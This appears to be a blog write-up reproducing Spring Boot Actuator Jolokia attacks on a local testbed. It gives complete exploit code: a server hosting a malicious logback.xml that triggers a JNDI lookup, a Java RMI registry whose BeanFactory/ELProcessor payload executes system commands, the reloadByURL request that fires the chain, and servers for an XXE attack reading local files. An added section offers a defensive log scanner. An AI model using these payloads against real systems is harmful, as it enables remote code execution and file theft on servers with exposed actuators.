https://github.com/artsploit/actuator-testbed
The author of that repository provides a simple vulnerable environment. With Maven installed, package and run it directly from the project directory:

```shell
mvn install
mvn spring-boot:run
```
Reproducing the vulnerability

First, set up what the attack needs:

- an RMI service that executes system commands
- a logback configuration file that relays the target to that RMI service

Here is the code I used.

- http://127.0.0.1:1337/logback.xml

Serves the logback configuration that relays to the RMI service.
```python
#!/usr/bin/python
# -*- coding:utf-8 -*-
# @Author : b1u3r
# @Time : 2019/1/11 15:28
import tornado.web
import tornado.ioloop


class IndexHandler(tornado.web.RequestHandler):
    def get(self, *args, **kwargs):
        # serve a logback configuration whose insertFromJNDI element
        # makes the target perform a JNDI lookup against the RMI service
        self.write("""<configuration>
<insertFromJNDI env-entry-name="rmi://127.0.0.1:1097/jndi" as="appName" />
</configuration>""")


application = tornado.web.Application([
    (r'/logback.xml', IndexHandler),
])

if __name__ == "__main__":
    application.listen(1337)
    tornado.ioloop.IOLoop.instance().start()
```
- rmi://127.0.0.1:1097/jndi

The RMI service that executes system commands.
```java
/**
 * @author 浅蓝
 * @email [email protected]
 * @since 2019/3/15 10:57
 */
import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;

public class Test {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);
        // prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
        // redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "x=eval"));
        // expression language that starts 'cmd /c calc' via ProcessBuilder (Windows target); use /bin/sh on other platforms
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")"));
        // bind the Reference under the name 'jndi' so rmi://127.0.0.1:1097/jndi resolves to it
        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("jndi", referenceWrapper);
    }
}
```
Start both services and make sure they are reachable.

Finally, start the Spring Boot service being attacked.

Request payload:
http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:1337!/logback.xml
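As an added detection example (not part of the original post): a Python scanner that decodes Jolokia's `!`-escaped GET paths from constructed access-log lines and flags any `JMXConfigurator/reloadByURL` invocation such as the request above, reporting the configuration URL the target would be made to fetch. The log format and the Jolokia mount points (`/jolokia` or `/actuator/jolokia`) are assumptions.

```python
import re
from urllib.parse import urlsplit
# Constructed sample access-log lines (combined log format assumed); line 2 is this write-up's request.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jan/2019:15:28:01 +0800] "GET /actuator/health HTTP/1.1" 200 15
10.0.0.7 - - [11/Jan/2019:15:28:02 +0800] "GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:1337!/logback.xml HTTP/1.1" 200 90
10.0.0.7 - - [11/Jan/2019:15:28:03 +0800] "GET /jolokia/read/java.lang:type=Memory/HeapMemoryUsage HTTP/1.1" 200 210
"""
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')

def jolokia_segments(path):
    """Split a Jolokia GET path on '/', honouring its '!' escaping ('!/' = literal '/', '!!' = '!')."""
    segs, cur, i = [], [], 0
    while i < len(path):
        c = path[i]
        if c == '!' and i + 1 < len(path):  # escaped character: keep it literally
            cur.append(path[i + 1])
            i += 2
            continue
        if c == '/':
            segs.append(''.join(cur))
            cur = []
        else:
            cur.append(c)
        i += 1
    segs.append(''.join(cur))
    return [s for s in segs if s]

def inspect_request(path):
    """Return a finding if the path is a Jolokia exec of JMXConfigurator.reloadByURL, else None."""
    segs = jolokia_segments(path.split('?', 1)[0])
    if 'jolokia' not in segs:  # Jolokia may be mounted at /jolokia or /actuator/jolokia (assumption)
        return None
    rest = segs[segs.index('jolokia') + 1:]  # [exec, mbean, operation, args...]
    if (len(rest) < 4 or rest[0] != 'exec' or 'JMXConfigurator' not in rest[1]
            or rest[2] != 'reloadByURL'):
        return None
    url = rest[3]  # decoded argument: the config URL logback would fetch and parse
    return {'mbean': rest[1], 'operation': rest[2], 'url': url, 'host': urlsplit(url).hostname}

def scan_log(text):
    """Apply inspect_request to every request line, tagging hits with the client IP."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        finding = inspect_request(m.group('path')) if m else None
        if finding:
            finding['client'] = line.split(' ', 1)[0]
            findings.append(finding)
    return findings
```

Any hit is worth an alert: a legitimate deployment has no reason to reload its logging configuration from a caller-supplied URL, and the decoded `host` shows where the configuration (and any JNDI or DTD reference inside it) would be fetched from.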
The same reload can also be used for an XXE attack. The first script serves a logback.xml that pulls in an external DTD; the second script serves that DTD.
```python
import tornado.web
import tornado.ioloop


class IndexHandler(tornado.web.RequestHandler):
    def get(self, *args, **kwargs):
        # serve a logback.xml whose DOCTYPE loads the external DTD from port 8080
        self.write("""<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://127.0.0.1:8080/file.dtd">%remote;%int;]>
<a>&trick;</a>""")


application = tornado.web.Application([
    (r'/logback.xml', IndexHandler),
])

if __name__ == "__main__":
    application.listen(1337)
    tornado.ioloop.IOLoop.instance().start()
```
```python
import tornado.web
import tornado.ioloop


class IndexHandler(tornado.web.RequestHandler):
    def get(self, *args, **kwargs):
        # serve the external DTD: %d reads the local file, %int defines the
        # 'trick' entity that embeds its contents
        self.write("""<!ENTITY % d SYSTEM "file:///D:/hello.txt">
<!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">""")


application = tornado.web.Application([
    (r'/file.dtd', IndexHandler),
])

if __name__ == "__main__":
    application.listen(8080)
    tornado.ioloop.IOLoop.instance().start()
```
References
https://github.com/mpgn/Spring-Boot-Actuator-Exploit
https://lucifaer.com/2019/03/11/Attack Spring Boot Actuator via jolokia Part 1/
https://www.veracode.com/blog/research/exploiting-spring-boot-actuators